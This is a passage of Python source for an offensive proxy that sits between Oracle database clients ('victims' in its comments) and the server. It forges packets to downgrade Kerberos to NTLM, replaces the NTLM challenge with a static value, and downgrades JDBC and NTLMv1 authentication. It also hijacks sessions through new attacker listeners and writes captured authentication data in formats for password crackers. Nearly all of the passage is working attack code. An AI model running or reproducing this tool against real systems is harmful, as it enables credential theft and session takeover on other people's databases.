                    seqloc=getSeq(self.data)
                    if(seqloc):
                        seq=seqloc
                
                if(isKerberos(self.data) and downKerberos):
                    #Send the forged NTLM negotiate to the server instead of the kerberos type packet
                    sock.send(fakeNeg)
                    #The client waits the SrvName packet if the kerberos type is sent, so we send him a forged one
                    self.request.send(fakeSrvName)
                    #Reading the challenge from the server
                    self.header=sock.recv(8)
                    packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                    packet_length=socket.ntohs(packet_length)
                    self.data=sock.recv(packet_length-8)
                    realChall=self.header+self.data
                    #Reading the neg packet from the client, this will not send to the server
                    self.request.recv(8)
                    packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                    packet_length=socket.ntohs(packet_length)
                    self.data=self.request.recv(packet_length-8)
                    #Send the challenge packet that we received from the server
                    if(dochallengeNTLM):
                        realChall=staticNTLMChallange(realChall, challengeNTLM)
                    ntlmChallenge, ntlmServer=parse_NTLM_CHALLENGE_MESSAGE(realChall)
                    self.request.send(realChall)
                else:
                    if( not (quit and newClient)):
                        send=self.header+self.data
                        sock.send(send)
        
        #Data while, after the authentication
        while(quit==0):
            #From the server
            try:
                self.header = ""
                self.header=sock.recv(8)
            except:
                #print "timeout server"
                a=1
            if(len(self.header) >=8):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                if(packet_length > 8):
                    self.data=sock.recv(packet_length-8)
                else:
                    self.data=""
                send=self.header+self.data
                self.request.send(send)
                
                #Save the server packets for the hijack thread.
                if(not nomorefromsrv):
                    packetsfromsrv.append(send)
                    nofpacketsfromsrv+=1
                    #Long version string after the authentication. For hijack we needs just this packets
                    if(send.find("Oracle Database")!=-1):
                        nomorefromsrv=True
             #From the client
            try:
                self.header = ""
                self.header = self.request.recv(8)
            except:
                a=1
            if(len(self.header)):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                self.data=self.request.recv(packet_length-8)
                quit=checkQuit(self.data)
                if(quit):
                    if(newClient):
                        self.request.close()
                        client=NewClient(seq,sock,self.server.AttHost, self.server.AttPort, srvType, srvVer, clntType, clntVer, packetsfromsrv)
                        client.start()
                        self.server.AttPort=self.server.AttPort+1
                else:
                    if(packet_type!=12):        
                        seqloc=getSeq(self.data)
                        if(seqloc):
                            seq=seqloc
                if( not (quit and newClient)):
                    send=self.header+self.data
                    sock.send(send)
                


class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):

     # Ctrl-C will cleanly kill all spawned threads
    daemon_threads = True
    # much faster rebinding
    allow_reuse_address = True
    
    #The proxy  will listen on this address and on this port to accept connections from the victims  
    def setLocalListener(self,LstHost,LstPort):
        self.LstHost=LstHost
        self.LstPort=LstPort
    
    #The Oracle server IP address and port
    def setRemoteListener(self,SrvHost,SrvPort):
        self.SrvHost=SrvHost
        self.SrvPort=SrvPort
        
    #This will be the address and the first port for the attacker. When an additional victim logs out, the new thread will
    #listen on the AttPort+1  
    def setAttackerListener(self,AttHost, AttPort):
        self.AttHost=AttHost
        self.AttPort=AttPort
    
    def setIndex(self, index):
        self.index=index
    
    
if __name__ == "__main__":
    LstHost, LstPort = "", 1521
    configfile=""
   
    if len(sys.argv)==1:
        configfile="ptnsp.cfg"
    else:
        configfile=sys.argv[1]
        print configfile
    
    config=ConfigObj(configfile, configspec='ptnsp.cfs')
    validator = Validator()
    res=config.validate(validator)
    
    
    #The listening IP address, empty means on all interfaces
    LstHost=config['LstHost']
    #The listening port
    LstPort=config['LstPort']
    #Proxying the connecting client to this server
    SrvHost=config['SrvHost']
    #Proxying the connecting client to this port
    SrvPort=config['SrvPort']
    #When hijacking happens, accept the connection on this IP, empty means
    #on all interfaces
    AttHost=config['AttHost']
    #When hijacking happens, accept the connection on this port. When more
    #hijacking happens the port number is increased by one.
    AttPort=config['AttPort']
    #Downgrade the windows authentication to 1
    downNTLMv1=config['downNTLMv1']
    #Replace the challenge with a static one
    staticNTLM=config['staticNTLM']
    #Downgrade kerberos to NTLM 
    downKerberos=config['downKerberos']
    #Downgrade Oracle authentication in 11g thin driver
    downJDBC=config['downJDBC']
    #Start new client, for hijack
    newClient=config['newClient']
    #The attacked client name, it is necessary for the kereberos downgrading
    clientName=config['clientName']
    #The attacked server name, it is necessary for the kereberos downgrading
    serverName=config['serverName']
    #The windows domain, it is necessary for the kereberos downgrading
    domain=config['domain']
    #The windows user, it is necessary for the kereberos downgrading
    winUser=config['winUser']
    #Static challenge value for the NTLM authentication
    challengeNTLM=config['challengeNTLM']
    #Static challenge attack againdst NTLM authentication
    dochallengeNTLM=config['dochallengeNTLM']
    #If present save the auth info to the file in john the ripper format
    johnfile=config['johnfile']
    #If present save the auth info to the file in woraauthbf format
    worafile=config['worafile']
    
    server = ThreadedTCPServer((LstHost, LstPort), KerbTNSHandler)
    server.setLocalListener(LstHost, LstPort)
    server.setRemoteListener(SrvHost, SrvPort)
    server.setAttackerListener(AttHost, AttPort)
    server.setIndex(0)
    
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print "\nCtrl-C detected, exiting...\n"
        sys.exit(0)

